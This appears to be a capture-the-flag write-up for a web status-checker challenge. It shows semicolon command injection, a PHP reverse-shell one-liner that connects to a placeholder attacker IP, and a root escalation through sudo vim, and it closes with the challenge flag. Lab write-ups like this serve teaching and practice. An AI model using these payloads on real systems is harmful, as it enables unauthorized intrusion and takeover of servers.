2.8 KiB
We are given a site where we can check the status of websites.
Entering a valid URL such as https://google.com will return us the HTTP status code as seen in the following screenshot.
Entering a semi-colon (;) will break the command. We can try to use the payload ; whoami and we are returned www-data as our user as seen in the following screenshot.
We can attempt to spawn a reverse shell by first having netcat listen on our desired port. In this example, the port will be 45101 and the netcat command will be nc -nlvp 45101 as seen in the following screenshot.
Once its listening on the port, we can use the following payload to spawn the reverse shell. Replace "YOUR-IP-HERE" with your IP address.
; php -r '$sock=fsockopen("YOUR-IP-ADDRESS",45101);exec("/bin/sh -i <&3 >&3 2>&3");'
Input the above payload into the input box as seen in the following screenshot.
Click on the "Check HTTP Status" and observe that the website has hung. Return to the netcat session and observe that we have gotten a shell as seen in the following screenshot.
We can spawn an interactive shell using the command script -qc /bin/bash /dev/null. Once done, we can explore the system. We can use the command sudo -l and see that we can run the command vim as root without a password as seen in the following screenshot.
Using GTFOBins, we are able to breakout and obtain a shell as a root user using the following command:
vim -c ':!/bin/sh'
Using the command whoami we can see that we are now the root user as seen in the following screenshot.
We can obtain the flag in the root directory by using the command cd /root and cat flag.txt. The flag is HEX{N3tw0rK_ErR_500_W1kS2kKiL}.